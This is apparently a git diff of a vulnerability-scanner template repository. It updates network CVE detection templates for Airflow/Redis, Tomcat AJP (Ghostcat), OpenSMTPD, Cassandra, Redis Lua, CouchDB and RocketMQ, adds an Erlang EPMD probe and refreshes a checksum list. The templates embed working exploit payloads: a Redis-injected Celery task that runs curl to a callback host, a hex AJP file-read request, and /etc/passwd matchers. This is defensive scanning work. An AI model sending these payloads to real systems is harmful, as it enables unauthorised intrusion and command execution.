-  remediation: Upgrade apache-airflow to version 1.10.11 or higher.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -17,24 +19,36 @@ info:
     cwe-id: CWE-78
     epss-score: 0.93693
   metadata:
-    max-request: 1
-    shodan-query: product:"redis"
     verified: true
+    max-request: 2
+    shodan-query: product:"redis"
   tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive
-
 variables:
-  data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
+  data: "*3\r
+
+    $5\r
+
+    LPUSH\r
+
+    $7\r
+
+    default\r
+
+    $936\r
+
+    {\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
   encode1: '[[["curl", "http://'
   encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
   end: '"}'
-
 tcp:
   - inputs:
-      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}"
+      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r
+
+          ')}}"
         read: 1024
     host:
       - "{{Hostname}}"
-    port: 6379
+      - "{{Host}}:6379"
 
     matchers-condition: and
     matchers:
@@ -47,4 +61,4 @@ tcp:
         part: interactsh_request
         words:
           - "User-Agent: curl"
-# digest: 4a0a00473045022100caf296c484b791799a0d08be60df1b29e93e90e3de8445dbe4ebb69d9621b1d6022038c158844fff0ac0852e31db1e8bb1ed020b9a68ebd83c201778449f328b2389:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022006e488c4df33f02410a8ef6965c2e5029756058c181417f60c69d5025de65b79022100b2d4ec940c0b18f436c7f9dbaf76c529b16b2274d143956744460b26286397a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml
index b2aa7b6ec1..26442bcb45 100644
--- a/network/cves/2020/CVE-2020-1938.yaml
+++ b/network/cves/2020/CVE-2020-1938.yaml
@@ -5,31 +5,35 @@ info:
   author: milo2012
   severity: critical
   description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, or credentials.
+  remediation: https://access.redhat.com/solutions/4851251
   reference:
     - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
     - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
     - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
     - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
     - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
-  remediation: https://access.redhat.com/solutions/4851251
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-1938
     cwe-id: CWE-269
-    cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
     epss-score: 0.97486
+    cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
+    max-request: 4
+    vendor: apache
     product: geode
     shodan-query: title:"Apache Tomcat"
-    vendor: apache
   tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp
+
 tcp:
   - host:
       - "{{Hostname}}"
-    port: 8009
-
+      - "{{Hostname}}"
+      - "{{Host}}:8009"
+      - "{{Host}}:8009"
     inputs:
       - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"
     read-size: 1024
@@ -37,4 +41,4 @@ tcp:
       - type: word
         words:
           - "See the NOTICE file distributed with"
-# digest: 490a004630440220722a6fda7f8d144e99bbd80620843c6b1456e712959f440cac73b0317ae254be02202b50989e8f28b8b1c05e40a6189d362652dee87a9ee38d1d9f46fc3d2c441dd7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206c5764fc106fb38aba12b2687b2545b6d01fb7b732f5b61eb60664049bcde0f8022015540e1df24f52709ad329758455067965316a20217e2442acacc423c1ea78b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml
index 4c2ed9277a..cd06d89738 100644
--- a/network/cves/2020/CVE-2020-7247.yaml
+++ b/network/cves/2020/CVE-2020-7247.yaml
@@ -6,30 +6,31 @@ info:
   severity: critical
   description: |
     OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the OpenSMTPD process, potentially leading to a complete compromise of the affected system.
+  remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
   reference:
     - https://www.openwall.com/lists/oss-security/2020/01/28/3
     - https://nvd.nist.gov/vuln/detail/CVE-2020-7247
     - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45
     - http://www.openwall.com/lists/oss-security/2020/01/28/3
     - http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html
-  remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-7247
     cwe-id: CWE-755
-    cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:*
     epss-score: 0.9749
+    cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
-    product: opensmtpd
+    max-request: 2
     vendor: openbsd
+    product: opensmtpd
   tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,kev
 tcp:
   - host:
       - "{{Hostname}}"
-    port: 25
-
+      - "{{Host}}:25"
     inputs:
       - read: 1024
 
@@ -62,4 +63,4 @@ tcp:
         part: raw
         words:
           - "Message accepted for delivery"
-# digest: 480a00453043021f7ef5362908882561d6dde64d53453b3152f39facf5bff6026ace711a28cafe02205cacf57b6193d5ab548c77baacf66b68439fbb63c343b4ecfd1fb3253b1a026f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e4375d5745c00b084ca047f04109092adc207018ca4534fe099dbabbb46efab302201b1a642db23ac295ebc9f3f7e6ffb05efa1b3773f64bba84465993ac173cdb80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml
index 137b1ff0a7..a6cc8e66fa 100644
--- a/network/cves/2021/CVE-2021-44521.yaml
+++ b/network/cves/2021/CVE-2021-44521.yaml
@@ -5,6 +5,9 @@ info:
   author: Y4er
   severity: critical
   description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the Cassandra process, potentially leading to a complete compromise of the affected system.
+  remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
   reference:
     - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
@@ -12,24 +15,22 @@ info:
     - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
     - http://www.openwall.com/lists/oss-security/2022/02/11/4
     - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/
-  remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 9.1
     cve-id: CVE-2021-44521
     cwe-id: CWE-732,CWE-94
-    cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*
     epss-score: 0.01212
+    cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
-    product: cassandra
+    max-request: 2
     vendor: apache
+    product: cassandra
   tags: cve,cve2021,network,rce,apache,cassandra
 tcp:
   - host:
       - "{{Hostname}}"
-    port: 9042
-
+      - "{{Host}}:9042"
     inputs:
       - data: "050000000500000000"
         type: hex
@@ -71,4 +72,4 @@ tcp:
         part: raw
         words:
           - "123123"
-# digest: 4a0a00473045022066ac296d5d1fd004ace89e39ecb2657d792ef93945cff6e3adeaca82d9b39faf022100b0320b6067d4643eea86c70dddfa01b432652dc53809a81204f7795cfbfa303c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a15b4842f1ea0adcff7d512c822ac340d25e8e44c4f8e5324bb705b66a9826d902206339fb69b828f8816e67e1895b9f4f835bf5621b55fd1145188d51113348b12a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml
index 2f61707354..1b2082a1d0 100644
--- a/network/cves/2022/CVE-2022-0543.yaml
+++ b/network/cves/2022/CVE-2022-0543.yaml
@@ -5,25 +5,30 @@ info:
   author: dwisiswant0
   severity: critical
   description: |
-    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
+    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
+    vulnerability was introduced by Debian and Ubuntu Redis packages that
+    insufficiently sanitized the Lua environment. The maintainers failed to
+    disable the package interface, allowing attackers to load arbitrary libraries.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system.
+  remediation: Update to the most recent versions currently available.
   reference:
     - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
     - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
     - https://bugs.debian.org/1005787
     - https://www.debian.org/security/2022/dsa-5081
     - https://lists.debian.org/debian-security-announce/2022/msg00048.html
-  remediation: Update to the most recent versions currently available.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10
     cve-id: CVE-2022-0543
-    cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
     epss-score: 0.97184
+    cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
   metadata:
+    vendor: redis
     max-request: 2
     product: redis
     shodan-query: redis_version
-    vendor: redis
   tags: cve,cve2022,network,redis,unauth,rce,kev
 
 tcp:
@@ -40,4 +45,4 @@ tcp:
       - type: regex
         regex:
           - "root:.*:0:0:"
-# digest: 4b0a004830460221009d349fed6b3bf4fd9604533cb5f57ffcec818eda7e49ac4e7be81dc1c5a2b0b3022100902ed033bee2919852cc2e890b5a5aa71600e31aabf41f1f1f957cf4286a4cd3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100add9594e259ef5ddcc1dcde7f1223746d280feb74ec18532bd8aa1af5c9f765902202a3643153452d8a91ee75c4418e174d765a7e855b2650a325b41962940c36eb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml
index 5044493599..9bbf092688 100644
--- a/network/cves/2022/CVE-2022-24706.yaml
+++ b/network/cves/2022/CVE-2022-24706.yaml
@@ -6,28 +6,31 @@ info:
   severity: critical
   description: |
     In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
+  remediation: |
+    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
   reference:
     - https://www.exploit-db.com/exploits/50914
     - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
     - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
     - http://www.openwall.com/lists/oss-security/2022/04/26/1
     - http://www.openwall.com/lists/oss-security/2022/05/09/1
-  remediation: |
-    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-24706
     cwe-id: CWE-1188
-    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
     epss-score: 0.97407
+    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
+    verified: "true"
+    max-request: 2
+    vendor: apache
     product: couchdb
     shodan-query: product:"CouchDB"
-    vendor: apache
-    verified: "true"
   tags: cve,cve2022,network,couch,rce,kev,couchdb
+
 variables:
   name_msg: "00156e00050007499c4141414141414041414141414141"
   challenge_reply: "00157201020304"
@@ -36,8 +39,7 @@ variables:
 tcp:
   - host:
       - "{{Hostname}}"
-    port: 9100
-
+      - "{{Host}}:9100"
     inputs:
       # auth
       - data: "{{name_msg}}"
@@ -59,4 +61,4 @@ tcp:
           - "gid"
           - "groups"
         condition: and
-# digest: 4a0a00473045022027bf1c67d39122a04c2ca8499783e0f2ac84b6e23cf59f30bb7b8dae2e703f3f02210081122aa44e3c92fec1f51b0196655fa5306124c3d1a8cb9a6eb823960add7c9d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c68c00183a56007bd25eac13c71d40998c2af3eef34996ba211b1f2b23910f220220600633a935877e9ddcd8b3ace1122e1351706f4ff443517029bd6782316e80b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml
index daf86ab549..ff5136b516 100644
--- a/network/cves/2022/CVE-2022-31793.yaml
+++ b/network/cves/2022/CVE-2022-31793.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the system.
   remediation: Update the application to version 1.10
   reference:
     - https://derekabdine.com/blog/2022-arris-advisory.html
@@ -42,4 +44,4 @@ tcp:
         encoding: hex
         words:
           - "726f6f743a"
-# digest: 4a0a0047304502207d801807d75631c019ffb3209944b43da4fb82cfae8a920d7f57f59b20d1db43022100c350aa2d2e714e231e49139bbd5aaf9d1ef5c169c398e001d3889c3c5d5fda10:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009b05936ed95a2a7ddbbc5208f9700bde46444478d346bc0fb5a49536d412a296022100d38751650b103df83fe828f622a9c22172a448450ff14565f70326b80c15570a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml
index eea7b166d4..e62f0c2961 100644
--- a/network/cves/2023/CVE-2023-33246.yaml
+++ b/network/cves/2023/CVE-2023-33246.yaml
@@ -6,13 +6,15 @@ info:
   severity: critical
   description: |
     For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
+  remediation: Update the RocketMQ application to version 5.1.1
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-33246
     - https://github.com/I5N0rth/CVE-2023-33246
     - http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html
     - http://www.openwall.com/lists/oss-security/2023/07/12/1
     - https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp
-  remediation: Update the RocketMQ application to version 5.1.1
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -46,4 +48,4 @@ tcp:
           - contains(raw,'serializeTypeCurrentRPC')
           - contains(interactsh_protocol,'dns')
         condition: and
-# digest: 490a0046304402206e09a8c1b51e8dbac583b99a66c656b1f3d1db95206a9cde1b5ab2954bc328a10220270998d52910d37fee9cfe33cfac9a5d4556ce4da164aee59842e85cfae37055:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203143447254bf01fd2e85d0c1f2d45ae23544c97cb2566cf8e80a101d31c4af67022100f4a7e752de33f44cc92ec7950f0eae4005a6ae4665865953591777742de210c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml
new file mode 100644
index 0000000000..b32ad6c6ad
--- /dev/null
+++ b/network/misconfig/erlang-daemon.yaml
@@ -0,0 +1,31 @@
+id: erlang-daemon
+
+info:
+  name: Erlang Port Mapper Daemon
+  author: pussycat0x
+  severity: low
+  description: |
+     The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to keep track of which node name listens on which address. Hence, epmd map symbolic node names to machine addresses.
+  reference:
+    - https://nmap.org/nsedoc/scripts/epmd-info.html
+    - https://book.hacktricks.xyz/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd
+    - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd
+  metadata:
+    verified: "true"
+    shodan-query: product:"Erlang Port Mapper Daemon"
+  tags: demon,enum,erlang,epmd
+
+network:
+  - inputs:
+      - data: "\x00\x01\x6e"
+
+    host:
+      - "{{Hostname}}"
+    port: 4369
+
+    extractors:
+      - type: dsl
+        name: default-instances
+        dsl:
+          - trim(raw, '[ ]')
+# digest: 4a0a00473045022100b89f5decf05270376807e4939e73fe4dac06980af1e0effd1197574fc4795ef902204ba678cb5249cb4c5192fc94d608ae78959458dd3625a6b01ce6f492dc674dd1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 9c9f108b15..465a8cf3ed 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -7,13 +7,22 @@ README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26
 TEMPLATES-STATS.json:7ccb771c271fe2c18e8d9b86ffc044c3c3affd4a
 TEMPLATES-STATS.md:1c9813a0af8a44e624302050722dfec4d140810c
 TOP-10.md:2cd79b73aec87dde6c2ca8ef5f0df433fab3d107
+cloud/enum/aws-app-enum.yaml:89c981b97707bcc1220922aedf12d66157efa1b6
+cloud/enum/aws-s3-bucket-enum.yaml:0d19ed31b316429acb70c17108bcae54970daf81
+cloud/enum/azure-db-enum.yaml:b18cd9ca19b58bebad8d6435696ea190ffece035
+cloud/enum/azure-vm-cloud-enum.yaml:92bdaa05432ebef310e6309cee9aa68b47fe8b73
+cloud/enum/azure-website-enum.yaml:b602443f8b805523db4b21c575ea02958b233e80
+cloud/enum/gcp-app-engine-enum.yaml:87cf81f01096d8d46a8a4ecfd3cbbebefb0a6e1f
+cloud/enum/gcp-bucket-enum.yaml:dfb4ce78b2e788e63e854002d5ebab5d5df1595c
+cloud/enum/gcp-firebase-app-enum.yaml:edf117129322748b176e2bdfe3c09c9dd08f7922
+cloud/enum/gcp-firebase-rtdb-enum.yaml:b58a6dddcce8919580ea3c23ae1e9f0b1a1f8ed8
 code/cves/2023/CVE-2023-2640.yaml:50153a9f47faa62533d609faec8d12113d620354
 code/cves/2023/CVE-2023-49105.yaml:3512873783f700bf5fb98b342dd84653085a0a79
 code/cves/2023/CVE-2023-4911.yaml:b0087888697dcdbdf06ec95866cf08fcd6a2a76a
 config/recommended.yml:56cce704c23915f282aa2bca69952626aeea5e13
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:4500cac1239266cc0c96b02fc4bf689290b18f93
-cves.json-checksum.txt:f110519bd9447c733f8276833f45a4c38375f1ed
+cves.json:06f1b457f42fb28649ba5342a462c84c3f8c2fda
+cves.json-checksum.txt:fc7c554376e31384ec60488e43ac7b322c0b616a
 dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
@@ -636,7 +645,7 @@ http/cnvd/2021/CNVD-2021-17369.yaml:3efd9ab3bb9228c7e520720c3f0e265bcbbdd4d5
 http/cnvd/2021/CNVD-2021-26422.yaml:ae1967b624cd6ed957835c1cb1d1678157ab4ccc
 http/cnvd/2021/CNVD-2021-28277.yaml:a1668e1a8823489e8abe4db9486b871fbda5a028
 http/cnvd/2021/CNVD-2021-30167.yaml:b8ada61f246fab538976a248e99e8818f4ae3c28
-http/cnvd/2021/CNVD-2021-32799.yaml:a56e579adbc4f52d4489962389d34f0eca2c1806
+http/cnvd/2021/CNVD-2021-32799.yaml:bab3ca3606fbcecf4ac6ae97ce71ccab925f4cc6
 http/cnvd/2021/CNVD-2021-33202.yaml:fd9ce3035ef487bf0003b744a814c24621bcc190
 http/cnvd/2021/CNVD-2021-41972.yaml:7eb30f04d2cd98cafb0f0e93bad911d38bd582d4
 http/cnvd/2021/CNVD-2021-43984.yaml:ccc9cab63944be4dd86056625233106d135d5e36
@@ -663,422 +672,423 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:b360401b724799237fbd4b0b00
 http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:cbc4e1b8c4e34dac287a4252acb76481bf0e4dc5
 http/credential-stuffing/self-hosted/grafana-login-check.yaml:8f5793e273b313b8fdc6ef9a28efef7786fe4802
 http/credential-stuffing/self-hosted/jira-login-check.yaml:cccab91229b3c826d50f35b9d6b3a52755417602
-http/cves/2000/CVE-2000-0114.yaml:3f35579064b432952bae1a8ca256bed0db803246
-http/cves/2001/CVE-2001-0537.yaml:9fa56a49d64e3f49ba191847adfef99ea3fb5e8a
-http/cves/2002/CVE-2002-1131.yaml:14decb8b9b16e6fcf34ed35fa497ee0dd015878c
-http/cves/2004/CVE-2004-0519.yaml:1dc8bfb43c26eca5f5385189e51f8ea2ab2d0d1d
-http/cves/2004/CVE-2004-1965.yaml:9e4f47143cdfe4bdc15d89017cf0b2b911c5460c
-http/cves/2005/CVE-2005-2428.yaml:e3cb5127de8a7a5f2f1ae5e6c759143af427bfb0
-http/cves/2005/CVE-2005-3344.yaml:283494a78ed97c23729609645e8cfb2d1615bc93
-http/cves/2005/CVE-2005-3634.yaml:2ab77d0a1d0d31515563ac59a226640e5192b23e
-http/cves/2005/CVE-2005-4385.yaml:f78c2f0bd8c63bcc8b0989322d33f4cb70e34775
-http/cves/2006/CVE-2006-1681.yaml:c0f5908d9d07a6e9fe20e7cc06218b959223eb5c
-http/cves/2006/CVE-2006-2842.yaml:ecff825a49cec5b3aa10156d664ac319dd8342bf
+http/cves/2000/CVE-2000-0114.yaml:9216f01e2ee80ffe7fe7c96e39ab41398ad38cc1
+http/cves/2001/CVE-2001-0537.yaml:a3b6f678a9d0152e7aef216d63e27dd8a38977b7
+http/cves/2002/CVE-2002-1131.yaml:f3a49e1602c229940eb661ed7c036e1dcd93d5e7
+http/cves/2004/CVE-2004-0519.yaml:bd027963cd8e706f35cef59cf0aa0b18a7a5d88a
+http/cves/2004/CVE-2004-1965.yaml:625c074e4f76927af2a9706c2e73ebc2725770a6
+http/cves/2005/CVE-2005-2428.yaml:9000f422667f04e7ce6a0c9195e2392b8df8ffe5
+http/cves/2005/CVE-2005-3344.yaml:5fb6caf9ff8346fa14541a04809450217ab382f0
+http/cves/2005/CVE-2005-3634.yaml:d965762e63408e78559d2a393ea6cec231207b4b
+http/cves/2005/CVE-2005-4385.yaml:d1553e6d4c1f5845b4472b5cad19c458a8b6c8e1
+http/cves/2006/CVE-2006-1681.yaml:6b17152834026637196e730f53574239848f08b9
+http/cves/2006/CVE-2006-2842.yaml:27ba276ba6df590a8354850d0a1a4aeb8da348c2
 http/cves/2007/CVE-2007-0885.yaml:922f26e2a0bb4d7d8602d25d7281c967f135d0e3
-http/cves/2007/CVE-2007-4504.yaml:d852d8776d5337d79d41c331a098b770e7d4ac79
-http/cves/2007/CVE-2007-4556.yaml:e3d484c805f6cb1f3dfdbb244e03ada76bd4de7c
